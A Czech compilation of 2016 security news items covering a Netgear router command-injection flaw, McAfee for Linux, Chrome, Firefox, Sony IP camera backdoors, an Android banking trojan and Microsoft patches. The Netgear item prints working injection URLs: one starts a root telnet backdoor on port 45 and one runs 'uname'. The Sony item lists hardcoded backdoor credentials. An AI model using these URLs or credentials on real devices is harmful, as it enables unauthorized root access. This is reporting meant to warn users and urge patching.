Jako první na chybu upozornil uživatel s přezdívkou Acew0rm, který na Twitteru zveřejnil i jednoduchý koncept útoku. Zranitelnost spočívá v tom, že neautorizovaný uživatel dokáže provést libovolný příkaz v prostředí routeru s nejvyšším root oprávněním.

Příklad útočného skriptu, který otevře službu Telnet na portu 45 - se znalostí IP routeru:

http://192.168.1.1/;telnetd$IFS-p$IFS'45 '

Může jít přitom o spuštění služby Telnet na určitém portu za účelem vytvoření zadních vrátek. Stejně se však dá i manipulovat s firmwarem a vložit do zařízení například škodlivý kód, který připojí router do botnetu. Možností zneužití je neomezené množství.

Klepněte pro větší obrázek
Chyba se nevyhnula ani vrcholnému modelu R8000

Chybu je možné využít pouze z lokální počítačové sítě. Přesto stačí, když se hackerům podaří přesvědčit oběť, aby například navštívila infikované internetové stránky. Ty budou obsahovat skript, který na pozadí, bez jakékoli interakce uživatele, infikuje zranitelný router.

Netgear se snažil uživatelům zjednodušit konfiguraci svých produktů, přičemž vytvořil speciální portál www.routerlogin.net. Po jeho zadání se otevře webové rozhraní připojeného routeru. Uživatel, naneštěstí ani útočník, tak nemusí znát přesnou IP adresu zařízení a dokáže se na něj připojit.

Netgear se za chybu omluvil a rychle pracuje na nápravě. Postupně uvolňuje nové verze firmwaru pro jednotlivé modely, byť zatím jen v rychle vytvořené betaverzi. Toto jsou modely, u kterých byla chyba zjištěna a opravný firmware je již k dispozici:

R6250
R6400
R6700
R6900
R7000
R7100LG
R7300DST
R7900
R8000
D6220
D6400
Zjistit, zda je váš Netgear router zranitelný, nebo ne, lze podle jednoduchého testu. Stačí kliknout na tento odkaz: www.routerlogin.net/cgi-bin/;uname$IFS-a Pokud je odpovědí chybové hlášení (např. 404 - Not Found), respektive zcela prázdná stránka, router netrpí touto zranitelností. V případě, že se objeví něco jiného, například informace typu: Linux R7000 2.6.36.4brcmarm + # 30 SMP PREEMPT, zařízení obsahuje chybu.

Napadnutelných routerů je daleko více. Záplata ale před hackery zavře dveře

15.12.2016 Živě.cz Zranitelnosti

Kritickou bezpečnostní chybu mohl v minulých dnech využít prakticky jakýkoliv počítačový pirát v routerech společnosti Netgear. Zneužít trhlinu v těchto branách do světa internetu mohli k zachytávání citlivých informací i k přesměrování síťového provozu na všech připojených zařízeních. Čerstvě vydaná oprava však všechny tyto problémy řeší.

O vydání záplaty informoval ve středu Piotr Dudek, regionální ředitel společnosti Netgear pro střední a východní Evropu.

Ten zároveň upozornil, že chyba se týkala daleko více routerů, než bylo původně uváděno. Podle amerického bezpečnostního týmu US-CERT totiž trhlinu obsahovaly pouze prémiové modely R7000 a R6400. Už tehdy se nicméně předpokládalo, že postižených zařízení bude kvůli použití jednotného uživatelského prostředí daleko více. [celá zpráva]

A to nyní potvrdil i samotný výrobce. Chyba se tak tedy týká modelů R6250, R6400, R6700, R6900, R7000, R7100LG, R7300DST, R7900, R8000, D6220, D6400 a D7000. Seznam navíc nemusí být ani v tuto chvíli konečný, další zařízení totiž pracovníci Netgearu stále ještě prověřují.

Nový ovládací software
Chybu v dotčených zařízeních již výrobce opravil v nové verzi ovládacího softwaru (firmwaru). Ten je však v současnosti k dispozici pouze v testovací verzi. I tak lze ale její instalaci s ohledem na možná rizika doporučit, jinak totiž budou moci kyberzločinci trhlinu zneužít.

Finální verze aktualizace by měla být pro všechny uživatele k dispozici v horizontu maximálně několika dní.

S využitím chyby mohou počítačoví piráti v domácí nebo podnikové síti udělat pěknou neplechu. Zranitelnost totiž umožňuje na napadeném zařízení spustit libovolný škodlivý kód na dálku, klidně i z druhého konce planety.

Přístup k připojenému PC
Že je router zavirovaný, mohou uživatelé poznat například podle toho, že jim přestane z připojených počítačů zcela fungovat internetové připojení, případně se při snaze o připojení na nějakou webovou stránku zobrazí úplně jiný web.

S instalací aktualizace by tak lidé neměli rozhodně otálet.

McAfee pro Linux má chránit před viry. Samo ale trpí kritickými zranitelnostmi, varují specialisté
13.12.2016 Živě.cz Zranitelnosti

Fanoušci Linuxu se celé roky smáli Windows pro jeho chyby a zranitelnosti. Nadávat na operační systém Redmondu a považovat ten komunitní za nenapadnutelný, bývalo otázkou dobrého bontonu, než se útočníci začali ve velkém orientovat i na tuto platformu.

Záhy se zjistilo, že kritické knihovny linuxového a unixového světa nikdo neaudituje – vzpomeňme třeba na aféru Heartbleed, že jsou mnohé linuxové instance na hostingu nejen od Amazonu zapojené nevědomky v botnetech a že zejména s příchodem IoT jsou mnohé linuxové síťové krabičky počínaje starými Wi-Fi routery a konče chytrými ledničkami hotovou časovanou bombou, protože jejich firmware poměrně často nikdo neaktualizuje, a tak jsou plně bohatě zdokumentovaných a neopravených bezpečnostních děr.

Intel se částečně zbavuje McAfee, prodal 51 % společnosti za 3,1 miliardy dolarů
O linuxové systémy se ve velkém začaly zajímat antivirové společnosti, a tak bylo jen otázkou času, kdy se v tomto světě objeví i všudypřítomné McAfee.

A je to právě McAfee pro Linux, které nyní ironií osudu může otevírat zadní vrátka do linuxového systému. Ach ty životní paradoxy.

McAfee pro Linux trpí zranitelností, která může předat moc nad systémem útočníkovi – třeba zrovna nějakému botnetu, který pak může zneužít toho, že linuxový systém zpravidla běží někde na serveru, anebo ve zmíněné IoT krabici, a je tedy stále spuštěný a stále online.

Bezpečnostní specialisté zdokumentovali několik takových zranitelností už koncem června a v červenci kontaktovali přímo McAfee. Ten však následující měsíce vůbec nereagoval a ozval se až počátkem prosince v okamžiku, kdy jej specialisté informovali o datu zveřejnění zranitelnosti. Krátce poté firma informovala o zranitelnosti i své klienty.

Bezpečnostní specialisté se nakonec zranitelností dle plánu pochlubili včera 12. prosince s tím, že se dotýká všech verzí počínaje 1.9.2 z února 2015 až 2.0.2 z letošního jara.

A v čem je tato zranitelnost vlastně nebezpečná? Hlavně proto, že má antivirový program administrátorská práva, takže útočník, který ovládne linuxové McAfee, může v krajních případech získat práva pro přístup hluboko do systému. Detaily

Routery od Netgearu mohou snadno napadnout kyberzločinci. Záplata chybí

13.12.2016 Novinky/Bezpečnost Zranitelnosti
Na pozoru by se měli mít majitelé routerů od společnosti Netgear. Podle amerického bezpečnostního týmu US-CERT, který monitoruje zranitelnosti jednotlivých zařízení a aktuální trendy kyberzločinců na síti, totiž dva prémiové modely tohoto výrobce mají kritickou bezpečnostní chybu, kterou mohou počítačoví piráti snadno zneužít.
Trhlina se týká routerů Netgear R7000 a R6400, které cílí především na náročnější uživatele a menší podniky. Právě kvůli tomu ale objevená chyba představuje ještě větší riziko – především v podnikové síti totiž mohou počítačoví piráti udělat velkou neplechu.

„Zranitelnost umožňuje útočníkovi spustit na zařízení libovolný kód s právy uživatele root, pokud se mu podaří nalákat uživatele na speciálně připravenou webovou stránku,“ varoval Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

Podvodné webové stránky
To jinými slovy znamená, že útok začíná ve chvíli, kdy uživatel navštíví podvodnou webovou stránku. Prostřednictvím ní se dostane do routeru záškodník, s pomocí kterého může kyberzločinec například řídit síťový provoz.

Netgear R6400

Routery nepoužívat
„K dispozici je již i kód (exploit), který umožňuje provedení útoku. Zatím však není k dispozici žádná oprava, uživatelům se proto nedoporučuje routery dále používat,“ konstatoval Bašta.

Prozatím byla chyba prokázána pouze u zmiňovaných routerů Netgear R7000 a R6400. Není nicméně vyloučeno, že totožnou trhlinu v ovládacím softwaru používají i další modely tohoto výrobce.

Společnost NetGear se k objevené zranitelnosti zatím oficiálně nevyjádřila. Lze ale předpokládat, že v průběhu několika dnů či týdnů bude vydána aktualizace, která chybu opraví.

Chyba v Chromu blokovala certifikáty firmy Symantec

7.12.2016 SecurityWorld Zranitelnosti
Uživatele nejpopulárnějšího prohlížeče světa, Chromu, se mohli v nedávných měsících setkat s chybami při pokusu připojit se na webové stránky zabezpečené protokolem HTTPS; chyby se objevily jak při připojení z mobilu s Androidem, tak z klasických PC.

Chyba postihla potvrzování některých SSL certifikátů vydávaných firmou Symantec, jedné z největších společností vydávající certifikáty, známé také pro svůj antivirový program Norton. Chyba postihla i GeoTrust a Thawte, které také certifikáty vydávají. Vlastní je rovněž Symantec.

Chyba se objevila v Chromu verze 53, postihla i Android WebView komponent, který Androidí aplikace používají pro zobrazení webového obsahu, píše Rick Andrew, technický ředitel Symantecu v příspěvku na blogu.

K opravě problému na mobilním zařízení by si uživatelé měli aktualizovat WebView na nejnovější verzi spolu s pozdější aktualizací Chromu na verzi 55.

„Vývojáři používající Android Open Source Platform (AOSP) si budou sami muset ověřit kompatibilitu vlastních aplikací.“

Ačkoli jde o součást systému, od Androidu 5.0 (Lollipop) je WebView dodáván ve fformě aplikačního balíčku, aktualizovatelného skrze Google Play obchod.

Verze 55 WebView byla vydána 1. prosince, ale Chrome zatím setrvává ve verzi 54 z pozdního října.

Google ve verzi 54 udělal některé změny ve Windows, Macu, Linuxu i iOS, stejně jako v Chromium a Chrome Custom Tabs aplikacích tak, aby certifikáty Symantecu nevyvolávaly varování o nedůvěryhodnosti. V Chromu 55 je již problém zcela opraven na všech platformách, potvrdil Andrews.

V rámci zabezpečení je doporučeno na verzi 55 aktualizovat jakmile to jen bude možné. Na většině platforem to jde od 1. prosince.

Problém začal rozhodnutím Googlu – ten donutil Symantec publikovat veškeré certifikáty vydané po 1. červnu 2016 do veřejného registru – Certificate Transparency (CT).

Rozhodnutí přišlo po interním zkoumání Symantecu. Zajímal se o neautorizované udělování prodloužené platnosti (EV) certifikátům pro google.com, zkoumání však nedopadlo podle plánů a Google hrozil postihy proti Symantecu; svou hrozbu také splnil.

Protože poskytovatelé certifikátů závisí na prohlížečích, které se rozhodnout jimi uděleným certifikátům věřit, mají vůči nim firmy jako Google, Mozilla nebo Microsoft silnou páku. Po incidentu se Symantecem Google do Chromu implementoval mechanismus, který označil jako důvěryhodné pouze certifikáty po 1. červnu 2016.

Google však má ještě další mechanismus, kdy Chrome nastaví desetitýdenní limit pro důvěru certifikátům, aby informace nezastaraly. Když se to zkombinovalo s druhou kontrolou pro Symantec, výsledkem byla nechtěná nedůvěra v certifikáty i pro certifikáty splňující požadavky firmy.

V bezpečnostních IP kamerách Sony byla nalezena „zadní vrátka“, umožnila administrátorský přístup komukoli
7.12.2016 Novinky/Bezpečnost Zranitelnosti

S rozmachem internetu věcí vzniká i rozmach bezpečnostních hrozeb z počtu zařízení, která lze hacknout kvůli chybám v jejich zabezpečení. Ironií je, že tentokrát se ale problém objevil u profesionálních bezpečnostních kamer od Sony řady Ipela Engine.

Jak objevila bezpečnostní společnost SEC Consult, kamery měly ve firmwaru zabudovaný „backdoor“ (zadní vrátka“), která umožňovala tajný administrátorský přístup ke kameře komukoli a odkudkoli. Jednalo se o účet, který se nacházel přímo ve firmwaru (User: primana, Password: primana), nejednalo se tak o nějakou chybu, která může při návrhu hardwaru a softwaru vzniknout. Dle vyjádření šlo pravděpodobně o účet sloužící pro testování a kalibraci. Proč ho tam ale Sony nechalo, není jasné. Nalezen byl i další skrytý účet s názvem „debug“ a heslem „popeyeConnection“.

Dalším problémem, který se podařilo odhalit, byla defaultní hesla, která byla rovněž přímo ve firmwaru a nijak se negenerovala. To už se vymstilo u obrovského počtu zařízení, která hackeři ovládali do velkých botnetů.

Sony dle informací už vydala aktualizaci firmwaru, který by měl bezpečnostní problémy vyřešit.

Chrome má desítky bezpečnostních chyb. Některé jsou velmi vážné

6.12.2016 Novinky/Bezpečnost Zranitelnosti
Více než tři desítky chyb byly objeveny v oblíbeném webovém prohlížeči Chrome. Nejnovější verze tohoto browseru je však všechny opravuje. Vzhledem k tomu, že některé z objevených trhlin jsou vážné, neměli by uživatelé s instalací aktualizace otálet.
Nová verze prohlížeče s pořadovým číslem 55 opravuje celkem 36 bezpečnostních trhlin. Z nich 11 je přitom označeno nálepkou „vysoce závažné“.

To jinými slovy znamená, že je počítačoví piráti mohou zneužít k tomu, aby do počítače propašovali prakticky libovolný škodlivý kód. Stejně tak ale mohou přistupovat k nastavení napadeného stroje či uloženým datům na pevném disku.

Teoreticky mohou počítačoví piráti zneužít také některé trhliny, které mají nálepku „důležité“. U nich se nicméně nepředpokládá, že by v praxi došlo k jejich masivnímu zneužívání, jako je tomu u vysoce závažných bezpečnostních nedostatků.

Zlepšení funkčnosti
Zbylé aktualizace pak slouží především ke zlepšení funkčnosti jednotlivých součástí internetového prohlížeče. Tyto důležité záplaty by tedy neměly pro uživatele představovat žádné velké bezpečnostní riziko.

S instalací aktualizace Chromu by s ohledem na možná rizika neměli uživatelé otálet. Stahovat opravy je možné prostřednictvím automatických aktualizací.

Firefox má kritickou chybu. Oprava zatím chybí

1.12.2016 Novinky/Bezpečnost Zranitelnosti
Kritická bezpečnostní chyba byla objevena v internetovém prohlížeči Firefox. Útočníci ji mohou zneužít k tomu, aby do cizího počítače propašovali škodlivý kód. Záplata opravující trhlinu přitom zatím není k dispozici.

Internetový prohlížeč Firefox
Před chybou, kterou mohou zneužít počítačoví piráti, varoval Národní bezpečnostní tým CSIRT.CZ.

„Webový prohlížeč Mozilla Firefox obsahuje chybu, pomocí které může útočník spustit škodlivý kód. Společnost Mozilla potvrdila, že se chyba nachází ve verzích 41 až 50,“ uvedl Pavel Bašta, bezpečnostní analytik týmu CSIRT.CZ, který je provozován sdružením CZ.NIC.

To jinými slovy znamená, že kyberzločinci mohou na cizí stroj propašovat prakticky libovolný virus. A klidně i na dálku celou sestavu ovládnout.

V ohrožení jen uživatelé Windows
V ohrožení jsou však podle Bašty pouze uživatelé na operačním systému Windows. Firefox na jiných platformách totiž tuto chybu neobsahuje.

Vyzrát na tuto trhlinu mohou uživatelé i přesto, že záplata zatím chybí. Stačí nainstalovat vhodný doplněk. „Dočasně je možné se chránit používáním doplňků jako NoScript apod.,“ konstatoval bezpečnostní analytik.

Zástupci společnosti Mozilla již potvrdili, že na opravě pracují. Kdy bude vydána, však doposud neprozradili.

Mozilla podruhé v tomto týdnu záplatovala Firefox. Aktualizujte také Tor
1.12.2016 cnews.cz Zranitelnosti
Mozilla před dvěma týdny vydala Firefox 50 s tím, že další velké vydání přivítáme až v novém roce. Mělo však dojít nejméně k jednomu servisnímu vydání. Nakonec krátce po sobě došlo ke dvěma. První vyšlo 28. listopadu a opravilo kritickou díru spojenou s přesměrováním z připojení přes protokol HTTP na adresu data: s tím, že nové adrese byl přidělen původ předchozí adresy. Toho se dalo zneužít k manipulaci s cookies.

Jestliže v pondělí vyšel Firefox 50.0.1, od středy je oficiálně dostupný Firefox 50.0.2. I on opravuje kritickou díru. Tentokrát umožňovala skrze animace v grafických souborech SVG spustit škodlivý kód v hostitelských počítačích. Bohužel již byla aktivně zneužívána, a to na počítačích s Windows. Na situaci rychle zareagoval Tor, protože uživatelstvo tohoto prohlížeče bylo skrze díru odhalováno, což je přesný opak anonymity, kterou slibuje.

V tomto týdnu byly vydány dvě servisní verze Firefoxu (Ilustrační foto)

Proto pokud používáte Tor, rovněž aktualizujte, a to na verzi 6.0.7. Podle příspěvku na blogu Toru nebyl útok na počítače s Linuxem či macOS zjištěn, v bezpečí byli také ti, kdo měli v prohlížeči nastavenou vysokou hodnotu úroveň zabezpečení. Mozilla opravila Firefox nejen pro Windows, ale také pro další dvě zmíněné počítačové platformy. Podle příspěvku na Bugzille byla chyba v prohlížeči přítomná již pět let.

Díra opravená ve Firefoxu 50.0.2 (a ve Firefoxu ESR 45.5.1 a Thunderbirdu 45.5.1) je podle redaktora webu Ars Technica silně podobná té, kterou v roce 2013 využívala FBI k odhalování překupníků a překupnic materiálů s dětskou pornografií. Bezpečnostní expert pro Ars Technicu řekl, že podobnosti vedou ke spekulacím, zda byla tato díra záměrně vytvořena FBI nebo jinou vládní agenturou. To však zatím nebylo potvrzeno.

Díra v Chrome umožnila napadnout 318 000 zařízení
11.11.2016 Root Zranitelnosti
Prohlížeč Chrome v Androidu obsahuje vážnou zranitelnost, která je aktivně zneužívána k instalaci bankovního trojana. Zatím podlehlo více než 300 000 zařízení.
Bezpečnostní díra v prohlížeči Google Chrome pro Android umožňuje potichu na kartu stáhnout libovolnou aplikaci ve formátu .apk, tedy mimo oficiální obchod Google Play. Uživatel přitom nemusí nic potvrzovat, vše se stane potichu a automaticky. Chyba je už nyní v praxi zneužívána.

Někteří uživatelé v posledních dnech zaznamenali, že na jejich Androidu vyskočí dialog varující před zavirovaným zařízením. Doporučuje nainstalovat aplikaci, která virus sama odstraní.

Bohužel jde o útok, který zneužívá zranitelnosti v Google Chrome a pomocí upravené webové stránky zmanipuluje uživatele, aby zapnul možnost ruční instalace aplikací z .apk souborů. Pak rovnou do systému takovou aplikaci stáhne. Bez uživatelova potvrzení, bez jeho vědomí. Prohlížeč obvykle před stahováním souboru uživatele varuje a ptá se ho, jestli chce soubor na kartu uložit. V tomto případě je ale zneužita chyba v Chrome, která dovoluje soubor zapsat bez varování.

Jde o soubor last-browser-update.apk, který obsahuje bankovního trojana pojmenovaného Trojan-Banker.AndroidOS.Svpeng.q. Ten po úspěšném nainstalování požádá o správcovská práva, aby mohl blokovat antiviry v přístroji. Poté krade bankovní data a čísla karet, zobrazuje phishingové zprávy a vykrádá další data jako kontakty, zprávy či historii prohlížení.

Škodlivý kód je možné najít na běžných webech, protože se šíří prostřednictvím reklamní sítě Google AdSense. Tu používá celá řada webů, protože přes ni automaticky prodává reklamní prostor a za to získává finance na svůj provoz. V praxi tak může být „napadena“ prakticky libovolná stránka. Trojan se pak k uživateli začne stahovat, jakmile je načtena stránka s reklamou.

Od srpna bylo takto napadeno přes 318 000 zařízení s Androidem a mechanismus napadení popisují na blogu vývojáři společnosti Kasperski Labs, Mikhail Kuzin a Nikita Buchka. Postup spočívá v rozdělení stahovaného souboru na části a stažení pomocí funkce ve třídě Blob(). V takovém případě prohlížeč nekontroluje obsah souboru a dovolí jej uložit.

Uložený soubor může mít jedno z těchto jmen:

last-browser-update.apk
WhatsApp.apk
Google_Play.apk
2GIS.apk
Viber.apk
DrugVokrug.apk
Instagram.apk
VKontakte.apk
minecraftPE.apk
Skype.apk
Android_3D_Accelerate.apk.
SpeedBoosterAndr6.0.apk
new-android-browser.apk
AndroidHDSpeedUp.apk
Android_update6.apk
WEB-HD-VIDEO-Player.apk
Asphalt7_Heat.apk
CHEAT.apk
Root_Uninstaller.apk
Mobogenie.apk
Chrome_update.apk
Trial_Xtreme.apk
Cut_the_Rope2.apk
Установка.apk
Temple_Run.apk
Jde o jména existujících regulérních aplikací a trojan pak uživateli vysvětlí, že je potřeba nainstalovat důležitou aktualizaci. Uživatel pak už jen potvrdí, že je možné balíček nainstalovat a problém je na světě.

Google o problému ví, odstranil napadené reklamy a tvrdí, že bude chybu záplatovat. Bohužel se nehovoří o konkrétním termínu, ale pokud vše půjde standardní cestou, dočkáme se další záplaty na začátku prosince, kdy po šesti týdnech vyjde nová aktualizace Chrome. Útočníci tedy budou mít ještě tři týdny čas a budou moci chybu dále zneužívat.

Microsoft opravil desítky zranitelností, některé hackeři už zneužívají

11.11.2016 SecurityWorld Zranitelnosti
Chyby, z nich některé jsou dokonce kritické, se týkají systémů Windows, Office, Edge, Internet Exploreru či SQL Serveru.

Opravu chyb pokrývá 14 aktualizací zabezpečení, tzv. security bulletinů, z čehož jeden je věnovaný přímo Adobe Flash Playeru, který se od verzí Windows 8.1 a 10 aktualizuje skrze Windows Update. Šest bulletinů je hodnoceno jako kritických a osm jako důležitých.

Administrátoři by měli jako první aplikovat MS16-135, který popravuje zranitelnost nultého dne (zero day vulnerability); tu nyní zneužívá skupina hackerů v odborných kruzích známá jako Fancy Bear, APT28 nebo Strontium.

Zranitelnost označená jako CVE-2016-7255 byla veřejně odhalena Googlem již minulý týden, pouhých 10 dní potom, co o ní informoval firmu Microsoft. To způsobilo lehké tření ve vztahu obou společností.

Google dává prodejcům jen sedm dní na opravení chyb nebo alespoň snížení důsledků, pokud se dané zranitelnosti již zneužívají. Microsoft dlouhodobě s touto strategií nesouhlasí a domnívá se, že odhalení detailů o zranitelnosti vystavilo uživatele zvýšenému riziku.

Další z klíčových bulletinů je MS16-132, označený jako kritický. Opravuje několik chyb umožňujících spuštění kódu na vzdáleném systému (RCE) včetně další zranitelnosti nultého dne, kterou, dle Microsoftu, hackeři rovněž využívají.

Zranitelnost se nachází v knihovně fontů Windows a lze jí zneužít skrze speciálně vytvořené fonty, vložené do webových stránek nebo dokumentů. Úspěšné využití chyby umožňuje útočníkům převzít kompletní kontrolu nad systémem, varuje v bulletinu Microsoft.

Zbylé tři kritické bezpečnostní aktualizace jsou v Internet Exploreru a Edge, internetových prohlížečích firmy. Jde o bulletiny MS16-142 a MS16-129. Ačkoli detaily o chybách již unikly na veřejnosti, podle Microsoftu je zatím nikdo nezneužil.

Aktualizace zabezpečení mířená na Office balíček firmy, MS16-133, je označená jako důležitá; opět záplatuje možnosti spuštění kódu na vzdáleném systému. Zranitelnosti lze zneužít pomocí účelně vytvořených dokumentů.

„Protože Office dokumenty převládají ve firemním prostředí, myslím, že by [se adminitrátoři] měli k bulletinu chovat jako ke kritickému, i když je označen jen jako důležitý,“ říká Amol Sarwate, ředitel Vulnerability Labs firmy Qualys k analýze aktualizací.

Správci Microsoft SQL Serveru by zase měli upřednostnit MSL-136 bulletin, který zahrnuje záplaty na RDBMS engine, MDS API, SQL Analysis Services a SQL Server Agenta.

„Zranitelnosti SQL Serveru jsou poměrně vzácné, a ačkoli zde nehrozí útoky spuštěním kódu na vzdáleném systému, útočníci mohou získat zvýšená práva v systému, což jim může umožnit zobrazovat, měnit nebo mazat data či vytvářet nové účty,“ dodává Sarwate.

Populární přehrávač Flash Player je děravý. Opět

9.11.2016 Novinky/Bezpečnost Zranitelnosti
Hned několik bezpečnostních chyb bylo nalezeno v programu Flash Player. Společnost Adobe, která za touto populární aplikací pro přehrávání internetových videí stojí, již vydala pro všechny trhliny záplaty. Uživatelé by s ohledem na možná rizika neměli s jejich instalací otálet.
Hned několik bezpečnostních oprav vydávala společnost Adobe v minulém týdnu. Tehdy se počítačoví piráti mohli prostřednictvím objevených chyb dostat do napadeného stroje a spustit na něm libovolný škodlivý kód. [celá zpráva]

V praxi stejnou paseku mohou kyberzločinci nadělat i s využitím nově objevených chyb, na které upozornil Národní bezpečnostní tým CSIRT.CZ.

Jak již bylo zmíněno výše, opravy jsou však již k dispozici. „Nově uvolněné bezpečnostní záplaty pro Flash Player opravují několik závažných zranitelností umožňujících spuštění libovolného kódu,“ potvrdil Pavel Bašta, bezpečnostní analytik týmu CSIRT.CZ, který je provozován sdružením CZ.NIC.

To jinými slovy znamená, že s využitím chyb mohou piráti propašovat do cizího počítače prakticky jakýkoli virus.

Další várka oprav po týdnu
Společnost Adobe je s ohledem na aktuální hrozbu nucena vydávat další várku aktualizací pouhý týden poté, co byly opraveny předchozí trhliny.

I když se situace může zdát alarmující, je to dáno tím, že Flash Player je velmi populární. Tento přehrávač videí na internetu používají po celém světě desítky miliónů lidí. Právě proto se na něj velmi často zaměřují kyberzločinci.

Stahovat záplatu je možné prostřednictvím automatických aktualizací daného programu nebo prostřednictvím stránek společnosti Adobe.

Nově objevená zranitelnost intelovských čipů otevírá PC k útokům

21.10.2016 Zranitelnosti
Jedna z vlastností intelovských procesorů Intelu řady Haswell se může zneužít – umožní totiž překonat jeden z důležitých typů ochrany před nákazou, který nabízejí všechny nejdůležitějších operační systémy.

Techniku, objevenou třemi vědci z Newyorské státní univerzity a Kalifornské univerzity, lze zneužít k překonání ochrany ASLR (address space layout randomization). ASLR je bezpečnostní mechanismus, který umisťuje strojový kód programů, knihovny a data v operační paměti do náhodně zvolené adresy. Útočník tak neví, kam svůj škodlivý kód vložit.

Cílem ASLR je znemožnit některé druhy exploitů, jmenovitě např. stack nebo heap overflow. Ve chvíli, kdy se ASLR překoná a zranitelnost zneužije, nakažený kód se vloží na konkrétní pozici v paměti, ve kterém se daný proces nebo jádro operačního systému spouští jako běžná součást činnosti.

Ve své studii vědci popisují, že BTB (branch target buffer), což je mechanismus mezipaměti využívaný předpovídačem větvení CPU, může být využit k úniku ASLR adres vytvořením kolizí mezi rozdílnými uživatelskými procesy nebo procesy v jádru. Předpovídač větvení, branch target predictor, se u moderních procesorů využívá k optimalizaci výkonu.

„BTB ukládá cílové adresy nedávno spuštěných větvících instrukcí, takže tyto adresy mohou být získány přímo z BTB k obdržení instrukcí, začínajících v cíli příštího cyklu,“ vysvětlují vědci ve studii. „Neboť BTB je sdíleno několika aplikacemi spouštějícími se na stejném jádře, únik informace z jedné aplikace do další skrze boční kanál BTB je možný.“

Výzkumníci předvedli svůj na BTB založený bypass na počítači s Intel Haswell CPU a operačním systémem Linux s jádrem verze 4.5. Jejích útok spolehlivě zjistil ASLR jádra využitím BTB kolizí během přibližně 60 milisekund.

Samotná studie navrhuje několik jak softwarových, tak hardwarových řešení, které by BTB útokům v budoucnu zabránily; nebo lépe zabezpečily současné ASLR implementace.

Útočníci mají již dnes i jiné metody překonání ASLR, ale obvykle vyžadují nalezení dalších paměťových zranitelností a jejich propojení s původním exploitem. Díky zlepšení softwarového zabezpečení v posledních letech vyžaduje vzdálené spuštění škodlivého kódu obvykle několikastupňové exploity.

Bezpečnostní experti upozornili na 12 let starou chybu. Uživatelé se bránit nemohou

19.10.2016 Novinky/Bezpečnost Zranitelnosti
I 12 let stará chyba dokáže udělat bezpečnostním expertům pěkné vrásky na čele. Přesně takto starou trhlinu totiž objevili v minulých dnech bezpečnostní experti, kteří zároveň zjistili, že kyberzločinci ji mohou zneužít k útokům na zařízení internetu věcí (IoT). Samotní uživatelé se přitom prakticky bránit nemohou.
Co je internet věcí?

Za zkratkou IoT (Internet of Things, česky internet věcí) se ukrývá označení pro chytré přístroje, které jsou schopny připojovat se na internet a komunikovat mezi sebou prostřednictvím této celosvětové počítačové sítě.
Typicky jde například o zařízení, která umožňují sledování či ovládání některých funkcí na dálku. Připojit se k nim je možné prostřednictvím chytrého telefonu nebo počítačového tabletu přes internet, i když je uživatel na druhém konci planety.
Celosvětovou počítačovou síť mohou tímto způsobem využívat nejrůznější rekordéry, meteorologické stanice, ale klidně také chytré žárovky, u kterých je možné upravovat teplotu světla.
Chyba se týká protokolu OpenSSH, který využívají právě zmiňovaná zařízení ze segmentu chytrých domácností. Upozornili na ní výzkumníci ze společnosti Akamai Technologies – jednoho z největších světových poskytovatelů sítí distribuovaného obsahu.

Trhlinu mohou útočníci zneužít k tomu, aby v napadených zařízeních změnili nastavení proxy. Díky tomu jsou pak schopni řídit internetový provoz dotyčných přístrojů. Se stovkami tisíc napadených strojů, které je poslechnou na slovo, jsou schopni provádět například DDoS útoky.

Při něm velké množství PC – v tomto případě zařízení internetu věcí – začne přistupovat v jeden okamžik na konkrétní server. Ten zpravidla nezvládne tak vysoké množství požadavků zpracovat a spadne. Pro běžné uživatele se takto napadená webová stránka tváří jako nedostupná.

Přes dva milióny zařízení v ohrožení
Obavy jsou v případě objevené chyby na místě. Výše popsaným způsobem totiž mohou být zotročeny kvůli chybě v OpenSSH více než dva milióny zařízení.

Lze navíc předpokládat, že počítačoví piráti se trhlinu budou snažit velmi rychle zneužít. Botnety – tedy sítě zotročených počítačů nebo zařízení schopných přístupu na internet – jsou totiž na černém trhu ceněnou zbraní.

S dostatkem zotročených počítačů jsou totiž útočníci schopni vyřadit z provozu prakticky jakoukoliv webovou stránku a její provozovatele pak následně například vydírat, žádají po nich peníze za to, že útok ustane.

Chybu v protokolu OpenSSH může opravit pouze výrobce daného zařízení, a to vydáním nového firmwaru. Na rozdíl od klasických počítačů se tak uživatelé prakticky v současnosti před novou hrozbou bránit nemohou.

Popularita internetu věcí poroste
Internet věcí představuje pro uživatele velké pohodlí, zároveň se ale ukazuje i jeho stinná stránka – slabá bezpečnost.

Do roku 2020 přitom vzroste podle expertních odhadů počet připojených zařízení k internetu z nynějších 15 miliard na 200 miliard zařízení, na jednoho člověka tak připadne 26 těchto chytrých zařízení.

Kritické bezpečnostní chyby mají Windows, Internet Explorer i Office

17.10.2016 Novinky/Bezpečnost Zranitelnosti
Hned několik kritických chyb bylo odhaleno v softwarových produktech společnosti Microsoft. Trhliny byly nalezeny v operačním systému Windows, prohlížečích Internet Explorer i Edge a také v kancelářském balíku Office. Americký softwarový gigant již nicméně pro všechny zranitelnosti vydal opravy.
Objevené chyby jsou velmi nebezpečné, protože se podle serveru The Hacker News ukázalo, že je ještě před vydáním záplat mohli zneužít počítačoví piráti.

Ti přitom prostřednictvím nich mohli spustit na cizím počítači prakticky libovolný škodlivý kód. Stejně tak ale mohli přistupovat k nastavení napadeného stroje či k uloženým datům na pevném disku. Pro kritické zranitelnosti bylo vydáno celkem pět bezpečnostních záplat.

Administrátorský vs. uživatelský účet
Zajímavé je mimochodem také to, že útočníci skrze trhliny mohli získat pouze taková práva, jaká měl nastavená samotný uživatel. Kontrolu nad postiženým systémem tak mohli kyberzločinci převzít pouze v případě, že uživatel na stroji pracoval s administrátorskými právy.

To bohužel v praxi dělá celá řada uživatelů. Nově objevené chyby tak opět ukazují, jak nebezpečné je používat účet administrátora při běžné práci. Daleko vhodnější je vytvořit – nejen ve firmách, ale i v domácích podmínkách – na počítači více účtů a běžně používat pouze ty, které mají uživatelská oprávnění.

Účet s právy administrátora by měl být zapnut pouze v případě, kdy je to skutečně nezbytné.

Důležité opravy
Vedle oprav kritických chyb uvolnil americký počítačový gigant také několik důležitých aktualizací, které slouží především ke zlepšení funkčnosti samotného systému, ale například také kancelářského balíku Office. Ty ale nepředstavují pro uživatele žádné velké bezpečnostní riziko.

Stahovat všechny záplaty pro kritické i důležité trhliny, které vyšly společně s balíkem pravidelných běžných aktualizací, je možné prostřednictvím služby Windows Update.

Lovci chyb se mohou stát milionáři. Stačí najít jen jednu kritickou trhlinu

19.9.2016 Novinky/Bezpečnost Zranitelnosti
